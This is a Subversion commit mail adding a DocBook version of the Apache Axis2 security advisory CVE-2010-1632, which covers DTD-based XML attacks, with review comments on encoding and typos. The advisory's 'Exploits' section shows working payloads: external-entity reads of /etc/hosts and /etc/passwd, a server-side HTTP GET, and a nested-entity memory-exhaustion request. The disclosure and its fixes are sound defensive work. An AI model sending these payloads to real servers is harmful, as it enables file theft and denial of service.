Author: veithen
Date: Sun Jun 27 07:51:38 2010
New Revision: 958346
URL: http://svn.apache.org/viewvc?rev=958346&view=rev
Log:
CVE-2010-1632: Converted the advisory document to Docbook (instead of MS Word).
Added:
axis/axis2/java/core/security/advisory-cve-2010-1632/ (with props)
axis/axis2/java/core/security/advisory-cve-2010-1632/pom.xml (with props)
axis/axis2/java/core/security/advisory-cve-2010-1632/src/
axis/axis2/java/core/security/advisory-cve-2010-1632/src/docbkx/
axis/axis2/java/core/security/advisory-cve-2010-1632/src/docbkx/CVE-2010-1632.xml (with props)
Removed:
axis/axis2/java/core/security/CVE-2010-1632.docx
Propchange: axis/axis2/java/core/security/advisory-cve-2010-1632/
------------------------------------------------------------------------------
--- svn:ignore (added)
+++ svn:ignore Sun Jun 27 07:51:38 2010
@@ -0,0 +1 @@
+target
Added: axis/axis2/java/core/security/advisory-cve-2010-1632/pom.xml
URL: http://svn.apache.org/viewvc/axis/axis2/java/core/security/advisory-cve-2010-1632/pom.xml?rev=958346&view=auto
==============================================================================
--- axis/axis2/java/core/security/advisory-cve-2010-1632/pom.xml (added)
+++ axis/axis2/java/core/security/advisory-cve-2010-1632/pom.xml Sun Jun 27
07:51:38 2010
@@ -0,0 +1,62 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!--
+ ~ Licensed to the Apache Software Foundation (ASF) under one
+ ~ or more contributor license agreements. See the NOTICE file
+ ~ distributed with this work for additional information
+ ~ regarding copyright ownership. The ASF licenses this file
+ ~ to you under the Apache License, Version 2.0 (the
+ ~ "License"); you may not use this file except in compliance
+ ~ with the License. You may obtain a copy of the License at
+ ~
+ ~ http://www.apache.org/licenses/LICENSE-2.0
+ ~
+ ~ Unless required by applicable law or agreed to in writing,
+ ~ software distributed under the License is distributed on an
+ ~ "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+ ~ KIND, either express or implied. See the License for the
+ ~ specific language governing permissions and limitations
+ ~ under the License.
+ -->
+<project xmlns="http://maven.apache.org/POM/4.0.0"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+ xsi:schemaLocation="http://maven.apache.org/POM/4.0.0
http://maven.apache.org/maven-v4_0_0.xsd">
+ <modelVersion>4.0.0</modelVersion>
+ <parent>
+ <groupId>org.apache</groupId>
+ <artifactId>apache</artifactId>
+ <version>7</version>
+ </parent>
+ <groupId>org.apache.axis2</groupId>
+ <artifactId>advisory-cve-2010-1632</artifactId>
+ <version>1</version>
+ <name>Axis2 Security Advisory CVE-2010-1632</name>
+ <packaging>pom</packaging>
+ <build>
+ <plugins>
+ <plugin>
+ <groupId>com.agilejava.docbkx</groupId>
+ <artifactId>docbkx-maven-plugin</artifactId>
+ <version>2.0.10</version>
+ <executions>
+ <execution>
+ <goals>
+ <goal>generate-pdf</goal>
+ </goals>
+ <phase>compile</phase>
+ <configuration>
+ <includes>CVE-2010-1632.xml</includes>
+ <sectionAutolabel>1</sectionAutolabel>
+ </configuration>
+ </execution>
+ </executions>
+ <dependencies>
+ <dependency>
+ <groupId>org.docbook</groupId>
+ <artifactId>docbook-xml</artifactId>
+ <version>4.4</version>
+ <scope>runtime</scope>
+ </dependency>
+ </dependencies>
+ </plugin>
+ </plugins>
+ </build>
+</project>
\ No newline at end of file
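Review bot: the file ends without a trailing newline (the diff carries "\ No newline at end of file") even though svn:eol-style = native is set on it in this same commit; add a final newline so the checkout is clean on every platform and later diffs do not keep dragging the marker along. Otherwise the POM is consistent with the advisory source: the docbook-xml 4.4 runtime dependency matches the DocBook XML V4.4 DOCTYPE declared in CVE-2010-1632.xml, and binding generate-pdf to the compile phase is fine for a pom-packaged module with no sources, so a plain `mvn package` in this directory produces the PDF.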
Propchange: axis/axis2/java/core/security/advisory-cve-2010-1632/pom.xml
------------------------------------------------------------------------------
svn:eol-style = native
Added: axis/axis2/java/core/security/advisory-cve-2010-1632/src/docbkx/CVE-2010-1632.xml
URL: http://svn.apache.org/viewvc/axis/axis2/java/core/security/advisory-cve-2010-1632/src/docbkx/CVE-2010-1632.xml?rev=958346&view=auto
==============================================================================
---
axis/axis2/java/core/security/advisory-cve-2010-1632/src/docbkx/CVE-2010-1632.xml
(added)
+++
axis/axis2/java/core/security/advisory-cve-2010-1632/src/docbkx/CVE-2010-1632.xml
Sun Jun 27 07:51:38 2010
@@ -0,0 +1,479 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE article PUBLIC "-//OASIS//DTD DocBook XML V4.4//EN"
"http://www.oasis-open.org/docbook/xml/4.4/docbookx.dtd">
+<!--
+ ~ Licensed to the Apache Software Foundation (ASF) under one
+ ~ or more contributor license agreements. See the NOTICE file
+ ~ distributed with this work for additional information
+ ~ regarding copyright ownership. The ASF licenses this file
+ ~ to you under the Apache License, Version 2.0 (the
+ ~ "License"); you may not use this file except in compliance
+ ~ with the License. You may obtain a copy of the License at
+ ~
+ ~ http://www.apache.org/licenses/LICENSE-2.0
+ ~
+ ~ Unless required by applicable law or agreed to in writing,
+ ~ software distributed under the License is distributed on an
+ ~ "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+ ~ KIND, either express or implied. See the License for the
+ ~ specific language governing permissions and limitations
+ ~ under the License.
+ -->
+<article>
+ <articleinfo>
+ <title>Apache Axis2 Security Advisory (CVE-2010-1632)</title>
+ <subtitle>HTTP binding (REST) enables DTD based XML attacks</subtitle>
+ <author>
+ <firstname>Andreas</firstname>
+ <surname>Veithen</surname>
+ <email>[email protected]</email>
+ </author>
+ <releaseinfo>First version: May 16, 2010 ⢠First published: June 13,
2010 ⢠Last updated: June 13, 2010</releaseinfo>
+ </articleinfo>
+ <section>
+ <title>Description</title>
+ <para>
+ According to the SOAP 1.1 specification, <quote>A SOAP message
MUST NOT contain a
+ Document Type Declaration.</quote> In Axis2, this constraint is
enforced by the
+ <classname>StAXSOAPModelBuilder</classname> class, which is part
of Axiom. This
+ approach presents two issues:
+ </para>
+ <itemizedlist>
+ <listitem>
+ <para>
+ It only works for SOAP bindings. HTTP bindings supporting
plain XML messages
+ still allow document type declarations in request messages.
+ </para>
+ </listitem>
+ <listitem>
+ <para>
+ When processing a document with a document type
declaration,
+ <classname>StAXSOAPModelBuilder</classname> only reports
an error after
+ receiving the DTD event from the StAX parser. However, at
this point,
+ the StAX parser may already have processed (part of) the
document type declaration.
+ </para>
+ </listitem>
+ </itemizedlist>
+ <para>
+ This implies that Axis2 is vulnerable to DTD based XML attacks.
There are two types of such attacks:
+ </para>
+ <itemizedlist>
+ <listitem>
+ <para>
+ Document type declarations may reference other documents,
namely a DTD or
+ external entities declared in the internal subset. If the
XML parser is
+ configured with a default entity resolver (which is the
case for Axis2), this
+ allows an attacker to instruct the parser to access
arbitrary files. Since URLs
+ may be used as system IDs, this includes remote resources
accessible only in the
+ network where the server is deployed. An attacker may
exploit this in several ways:
+ </para>
+ <itemizedlist>
+ <listitem>
+ <para>
+ By inspecting the error message in the service
response, he may be able to
+ scan for the presence of certain files on the
local file system of the server
+ or for the availability of certain network
resources accessible to the server.
+ </para>
+ </listitem>
+ <listitem>
+ <para>
+ By including an internal subset in the document
type declaration of the
+ request and using external entity declarations, he
may be able to include
+ the content of arbitrary files (local to the
server) in the request.
+ There are many services that produce responses
that include information
+ from the request message (either as part of a
normal response or a SOAP fault).
+ By carefully crafting the request, the attacker
may thus be able to retrieve
+ the content of arbitrary files from the server.
+ </para>
+ </listitem>
+ <listitem>
+ <para>
+ Using URLs with the âhttpâ scheme, the
attacker may use the vulnerability
+ to let the server execute arbitrary HTTP GET
requests and attack other
+ systems that have some form of trust relationship
with the Axis2 server.
+ </para>
+ </listitem>
+ </itemizedlist>
+ </listitem>
+ <listitem>
+ <para>
+ While XML does not allow recursive entity definitions, it
does permit nested
+ entity definitions. If a document has very deeply nested
entity definitions,
+ parsing that document can result in very high CPU and
memory consumption during
+ entity expansion. This produces the potential for Denial
of Service attacks.
+ </para>
+ </listitem>
+ </itemizedlist>
+ </section>
+ <section>
+ <title>Systems affected</title>
+ <section id="axis2-affected">
+ <title>Axis2 deployments</title>
+ <para>
+ As shown in <xref linkend="solutions"/>, all Axis2
installations with versions
+ prior to 1.6 are to some extend vulnerable. The most
vulnerable installations
+ are those on which at least one service is deployed that has
an HTTP binding
+ accepting messages with content type
<literal>application/xml</literal>, i.e.
+ for which the <literal>disableREST</literal> parameter is set
to <literal>false</literal>.
+ Note that this is the default setting.
+ </para>
+ <para>
+ Even deployments with REST disabled are partially vulnerable
(see
+ <xref linkend="exploit-url-access"/> and <xref
linkend="exploit-dos"/>).
+ In addition, Axis2 deployments that use a StAX implementation
other
+ than Woodstox may have additional vulnerabilities also
affecting SOAP
+ requests<footnote><para>Woodstox parses the document type
declaration lazily,
+ i.e. only when the DTD event is consumed. In this case, the
protection in
+ <classname>StAXSOAPModelBuilder</classname> is
enough.</para></footnote>.
+ </para>
+ <para>
+ Note that all types of Axis2 deployments are affected by these
vulnerabilities.
+ This includes standalone deployments, deployments using the
WAR distribution
+ as well as Web applications embedding Axis2.
+ </para>
+ </section>
+ <section>
+ <title>Other products</title>
+ <para>
+ Axis2 is used in (or as the basis for) other products. This
includes the Synapse,
+ ODE, Tuscany and Geronimo projects from the ASF, as well as
several commercial
+ products. It is likely that these products are vulnerable as
well.
+ </para>
+ <para>
+ It is possible that Web service frameworks other than Axis2
are affected by
+ similar vulnerabilities.
+ </para>
+ <para>
+ The exploits described in <xref linkend="exploits"/> may be
used to check
+ whether a given product is vulnerable.
+ </para>
+ </section>
+ </section>
+ <section>
+ <title>Impact assessment</title>
+ <para>
+ The vulnerability described in this advisory may allow an attacker
to read
+ arbitrary files on the file system of the node where Axis2 runs,
provided that
+ the account running the Axis2 instance has access to these files
and that
+ Java 2 security is not used to prevent file system access. An
attacker may
+ also be able to retrieve unsecured resources from the network if
they are
+ reachable from the Axis2 instance with URLs that are recognized by
the Java
+ runtime. However, to do so, the attacker needs to create a
specially crafted
+ request that requires knowledge about the services deployed on the
Axis2
+ instance. Therefore, this vulnerability cannot be exploited in an
automated way.
+ </para>
+ <para>
+ The vulnerability may also allow the attacker to check the file
system of the
+ server (resp. network resources reachable by the server) for the
existence
+ of certain files (resp. resources), as well as to carry out Denial
of Service
+ attacks. These attacks donât require knowledge about the
services deployed
+ on Axis2 and may thus be exploited using scripting.
+ </para>
+ <para>
+ It is important that all users of Axis2 (and derived products) who
have
+ deployments that accept XML messages from untrusted sources take
appropriate
+ actions to mitigate the risk caused by the vulnerability described
in this
+ advisory. This also applies to users who have secured their
installations
+ using WS-Security (Rampart).
+ </para>
+ </section>
+ <section id="solutions">
+ <title>Solutions</title>
+ <para>
+ In order to avoid the vulnerability described in this advisory,
apply one of
+ the solutions explained in the following sections.
+ </para>
+ <section>
+ <title>Upgrade to Axis2 1.5.2 or 1.6</title>
+ <para>
+ The security issue described in this advisory is fixed in
Axis2 1.5.2 and 1.6.
+ These releases forbid document type declarations even for
+ <literal>application/xml</literal> documents. Therefore
upgrading to one of
+ these versions is the best solution. Note that at the date of
writing,
+ neither Axis2 1.5.2 nor Axis2 1.6 has been released yet.
However,
+ snapshot versions are available.
+ </para>
+ </section>
+ <section id="solution-disable-application-xml">
+ <title>Disable support for the application/xml content type</title>
+ <para>
+ This solution only applies to users who donât need REST
support.
+ </para>
+ <para>
+ As explained in <xref linkend="axis2-affected"/>, disabling
REST
+ support (using the <literal>disableREST</literal> parameter)
partially
+ solves the issue, but still leaves the system vulnerable to
some types
+ of attacks. Since the issue is caused by the component
responsible for
+ processing messages with content type
<literal>application/xml</literal>,
+ the only effective solution is to disable this component. It is
+ configured in <filename>axis2.xml</filename> using the
following declaration:
+ </para>
+<programlisting><![CDATA[<messageBuilder contentType="application/xml"
+
class="org.apache.axis2.builder.ApplicationXMLBuilder"/>]]></programlisting>
+ <para>
+ However, it is <emphasis role="strong">not</emphasis>
sufficient to just remove
+ this declaration. The reason is that Axis2 registers
+ <classname>ApplicationXMLBuilder</classname> by default, even
if there is
+ no explicit declaration for it in
<filename>axis2.xml</filename>. Therefore
+ the only way to disable this component is to override the
mapping for the
+ <literal>application/xml</literal> content type with a message
builder
+ that doesnât have the same vulnerability. The recommended
way is to
+ replace <classname>ApplicationXMLBuilder</classname> by
<classname>SOAPBuilder</classname>:
+ </para>
+<programlisting><messageBuilder contentType="application/xml"
+ class="org.apache.axis2.builder.<emphasis
role="strong">SOAPBuilder</emphasis>"/></programlisting>
+ <para>
+ The effect of this is that messages with content type
<literal>application/xml</literal>
+ are no longer processed as plain XML messages, but as SOAP
messages.
+ </para>
+ <para>
+ In addition to this configuration change, it is also necessary
to make sure that
+ Axis2 uses Woodstox as its StAX implementation. This is the
case if
+ <filename>wstx-asl-x.y.z.jar</filename> is in the classpath.
+ </para>
+ </section>
+ <section>
+ <title>Apply a security fix</title>
+ <para>
+ A fix for the issue described in this advisory is available in
source code form from the following location:
+ </para>
+ <para>
+ <ulink
url="https://svn.apache.org/repos/asf/axis/axis2/java/core/security/secfix-cve-2010-1632"/>
+ </para>
+ <para>
+ It has been successfully tested with Axis2 1.4.1 and 1.5.1. In
order to apply the fix,
+ execute the following steps:
+ </para>
+ <procedure>
+ <step>
+ <para>
+ Check out the project from Subversion:
+ </para>
+ <screen>svn co
https://svn.apache.org/repos/asf/axis/axis2/java/core/
+security/secfix-cve-2010-1632</screen>
+ </step>
+ <step>
+ <para>
+ Change into the
<filename>secfix-cve-2010-1632</filename> directory and
+ build the project using <ulink
url="http://maven.apache.org/">Maven</ulink>:
+ </para>
+ <screen>mvn package</screen>
+ </step>
+ <step>
+ <para>
+ Copy the JAR from the <filename>target</filename>
folder and add it to
+ the Axis2 classpath. For the standalone distribution,
this means adding
+ the JAR to the <filename>lib</filename> folder. For
WAR deployments,
+ add it to <filename>WEB-INF/lib</filename>.
+ </para>
+ </step>
+ <step>
+ <para>
+ Open the <filename>axis2.xml</filename> configuration
file and locate the
+ following entry:
+ </para>
+<programlisting><![CDATA[<messageBuilder contentType="application/xml"
+
class="org.apache.axis2.builder.ApplicationXMLBuilder"/>]]></programlisting>
+ <para>
+ Replace <classname>ApplicationXMLBuilder</classname> by
+ <classname>SecureApplicationXMLBuilder</classname>, as
shown below:
+ </para>
+<programlisting><messageBuilder contentType="application/xml"
+ class="org.apache.axis2.builder.<emphasis
role="strong">SecureApplicationXMLBuilder</emphasis>"/></programlisting>
+ <para>
+ Note that in the default
<filename>axis2.xml</filename> configuration
+ file shipped with Axis2 1.4.1, the <sgmltag
class="element">messageBuilder</sgmltag>
+ entry for <classname>ApplicationXMLBuilder</classname>
is duplicated.
+ The second entry must be removed in order for the
change to take effect.
+ </para>
+ </step>
+ </procedure>
+ <para>
+ As with the solution described in <xref
linkend="solution-disable-application-xml"/>,
+ also check that Woodstox is present in the classpath.
+ </para>
+ </section>
+ </section>
+ <section id="exploits">
+ <title>Exploits</title>
+ <section>
+ <title>Remote file access</title>
+ <para>
+ The vulnerability can be demonstrated using a stock Axis2
1.5.1 distribution into which the
+ SimpleStockQuoteService from the Apache Synapse project has
been
+ deployed<footnote><para><ulink
url="http://svn.apache.org/repos/asf/synapse/trunk/java/modules/samples/services/SimpleStockQuoteService/"/></para></footnote>.
+ The request that exposes the vulnerability is as follows:
+ </para>
+<programlisting><![CDATA[<!DOCTYPE getQuote [
+ <!ENTITY file SYSTEM "/etc/hosts">
+]>
+<getQuote xmlns="http://services.samples">
+ <request>
+ <symbol xmlns="http://services.samples/xsd">&file;</symbol>
+ </request>
+</getQuote>]]></programlisting>
+ <para>
+ Sending this request to the SimpleStockQuoteService
+
endpoint<footnote><para>http://localhost:8080/axis2/services/SimpleStockQuoteService</para></footnote>
+ using <literal>application/xml</literal> as content type gives
the following response:
+ </para>
+<programlisting><![CDATA[<ns:getQuoteResponse
xmlns:ns="http://services.samples">
+ <ns:return xsi:type="ax21:GetQuoteResponse"
+ xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+ xmlns:ax21="http://services.samples/xsd">
+ <ax21:change>3.9659262974249048</ax21:change>
+ <ax21:earnings>12.755839004148722</ax21:earnings>
+ <ax21:high>-157.5738168969912</ax21:high>
+ <ax21:last>157.71363587000337</ax21:last>
+ <ax21:lastTradeTimestamp>
+ Sun May 16 14:25:19 CEST 2010
+ </ax21:lastTradeTimestamp>
+ <ax21:low>164.30154930689852</ax21:low>
+ <ax21:marketCap>-4192110.249723876</ax21:marketCap>
+ <ax21:name>##
+# Host Database
+#
+# localhost is used to configure the loopback interface
+# when the system is booting. Do not change this entry.
+##
+127.0.0.1 localhost
+255.255.255.255 broadcasthost
+::1 localhost
+fe80::1%lo0 localhost
+ Company</ax21:name>
+ <ax21:open>-154.31609570318096</ax21:open>
+ <ax21:peRatio>23.935652759459877</ax21:peRatio>
+ <ax21:percentageChange>2.204736746512539</ax21:percentageChange>
+ <ax21:prevClose>179.88207905992505</ax21:prevClose>
+ <ax21:symbol>##
+# Host Database
+#
+# localhost is used to configure the loopback interface
+# when the system is booting. Do not change this entry.
+##
+127.0.0.1 localhost
+255.255.255.255 broadcasthost
+::1 localhost
+fe80::1%lo0 localhost</ax21:symbol>
+ <ax21:volume>7235</ax21:volume>
+ </ns:return>
+</ns:getQuoteResponse>]]></programlisting>
+ <para>
+ As can be seen, the response includes the full content of the
+ <filename>/etc/hosts</filename> file. While this leverages a
particular
+ feature of the SimpleStockQuoteService, it is expected that a
similar
+ attack can be performed with many real world services.
+ </para>
+ <para>
+ It should also be noted that this attack only works if the
+ <literal>disableREST</literal> parameter (see
<filename>axis2.xml</filename>)
+ is set to <literal>false</literal>. If REST is disabled, the
attack is no
+ longer possible and the response from the service will be as
follows:
+ </para>
+ <programlisting><![CDATA[<faultstring>Http binding is disabled for
this service.</faultstring>]]></programlisting>
+ </section>
+ <section id="exploit-url-access">
+ <title>Server file system scan and arbitrary HTTP GET request
execution</title>
+ <para>
+ Even when REST is disabled, the vulnerability can still be
exploited to
+ check the existence of a particular file on the server file
system.
+ Consider the following request (again with content type
<literal>application/xml</literal>):
+ </para>
+<programlisting><![CDATA[<!DOCTYPE root SYSTEM "/etc/passwd">
+<root/>]]></programlisting>
+ <para>
+ When sent to any valid endpoint, this triggers the following
response, assuming that
+ Axis2 is installed on a Unix system:
+ </para>
+<programlisting><![CDATA[<faultstring>[com.ctc.wstx.exc.WstxLazyException]
+Unexpected character '#' (code 35) in external DTD subset;
+expected a '<' to start a directive
+ at [row,col,system-id]: [1,1,"file:/etc/passwd"]
+ from [row,col {unknown-source}]: [1,1]</faultstring>]]></programlisting>
+ <para>
+ On a non Unix system or if the DOCTYPE declaration refers to a
non existing
+ file, the response will be different:
+ </para>
+<programlisting><![CDATA[<faultstring>[com.ctc.wstx.exc.WstxLazyException]
+(was java.io.FileNotFoundException) /non_existing_file
+(No such file or directory)
+ at [row,col {unknown-source}]: [1,43]</faultstring>]]></programlisting>
+ <para>
+ By inspecting the response, an attacker can easily determine
whether or not
+ a given file exists on the file system of the server.
+ </para>
+ <para>
+ The same technique can also be used to trick Axis2 into
executing
+ arbitrary HTTP GET requests (including query parameters):
+ </para>
+<programlisting><![CDATA[<!DOCTYPE root SYSTEM
"http://www.google.com/search?q=test">
+<root/>]]></programlisting>
+ </section>
+ <section id="exploit-dos">
+ <title>Denial of Service</title>
+ <para>
+ A Denial of Service attack using deeply nested entity
definitions can
+ easily be demonstrated using the following request:
+ </para>
+<programlisting><![CDATA[<!DOCTYPE root [
+ <!ENTITY x32 "foobar">
+ <!ENTITY x31 "&x32;&x32;">
+ <!ENTITY x30 "&x31;&x31;">
+ <!ENTITY x29 "&x30;&x30;">
+ <!ENTITY x28 "&x29;&x29;">
+ <!ENTITY x27 "&x28;&x28;">
+ <!ENTITY x26 "&x27;&x27;">
+ <!ENTITY x25 "&x26;&x26;">
+ <!ENTITY x24 "&x25;&x25;">
+ <!ENTITY x23 "&x24;&x24;">
+ <!ENTITY x22 "&x23;&x23;">
+ <!ENTITY x21 "&x22;&x22;">
+ <!ENTITY x20 "&x21;&x21;">
+ <!ENTITY x19 "&x20;&x20;">
+ <!ENTITY x18 "&x19;&x19;">
+ <!ENTITY x17 "&x18;&x18;">
+ <!ENTITY x16 "&x17;&x17;">
+ <!ENTITY x15 "&x16;&x16;">
+ <!ENTITY x14 "&x15;&x15;">
+ <!ENTITY x13 "&x14;&x14;">
+ <!ENTITY x12 "&x13;&x13;">
+ <!ENTITY x11 "&x12;&x12;">
+ <!ENTITY x10 "&x11;&x11;">
+ <!ENTITY x9 "&x10;&x10;">
+ <!ENTITY x8 "&x9;&x9;">
+ <!ENTITY x7 "&x8;&x8;">
+ <!ENTITY x6 "&x7;&x7;">
+ <!ENTITY x5 "&x6;&x6;">
+ <!ENTITY x4 "&x5;&x5;">
+ <!ENTITY x3 "&x4;&x4;">
+ <!ENTITY x2 "&x3;&x3;">
+ <!ENTITY x1 "&x2;&x2;">
+]>
+<root attr="&x1;"/>]]></programlisting>
+ <para>
+ When sent with content type <literal>application/xml</literal>
to any
+ valid endpoint, this request will cause an out of memory
condition
+ on the server. This works even if REST is disabled. The reason
is that
+ before checking if the request is acceptable, Axis2 needs to
parse
+ the start tag of the document element. The expansion of the
entity
+ used in the attribute on this element will then cause an out
of memory error.
+ </para>
+ </section>
+ </section>
+ <section>
+ <title>References</title>
+ <para>
+ The issue that causes the vulnerability exposed in the present
advisory was
+ initially described in JIRA report
+ AXIS2-4450<footnote><para><ulink
url="https://issues.apache.org/jira/browse/AXIS2-4450"/></para></footnote>.
+ </para>
+ </section>
+ <section>
+ <title>Contact</title>
+ <para>
+ Please send all security relevant comments (e.g. about additional
+ vulnerabilities not identified by this advisory) to
<email>[email protected]</email>.
+ Questions and comments that are not security relevant may be sent
to
+ the public <email>[email protected]</email> mailing list.
+ </para>
+ </section>
+</article>
\ No newline at end of file
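Review bot: several non-ASCII characters in this file arrive double-encoded (the bullets in the releaseinfo element show as "â¢", the quotes around http in the "Exploits" bullet as "â...â", and "donât" appears three times in the impact and solutions sections) even though the XML declaration says UTF-8, so either the file was saved in the wrong encoding or the content was re-encoded on the way in; please confirm the bytes on disk are UTF-8 or, safer for a document that is built by XSLT into a PDF, replace them with the ISO character entities that the DocBook 4.4 DTD already declares (`&bull;`, `&rsquo;`, `&ldquo;`/`&rdquo;`) or with plain ASCII quotes, so the build no longer depends on editor encoding. Two wording fixes in the same pass: "to some extend vulnerable" in the "Axis2 deployments" section should read "to some extent vulnerable", and "non Unix" / "non existing" in the file-system-scan section should be hyphenated ("non-Unix", "non-existing"). The `<email>` elements render as `[email protected]` in this mail; verify that the committed file carries the real addresses, since this is the contact channel the advisory tells readers to use for further security reports. This file also lacks a trailing newline while svn:eol-style = native is set on it; add one. On substance the document holds together: the footnote explaining that Woodstox parses the DTD lazily is exactly why both workarounds end by requiring Woodstox on the classpath, and the "disableREST" caveat is stated consistently in the "Systems affected", "Solutions" and "Exploits" sections.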
Propchange: axis/axis2/java/core/security/advisory-cve-2010-1632/src/docbkx/CVE-2010-1632.xml
------------------------------------------------------------------------------
svn:eol-style = native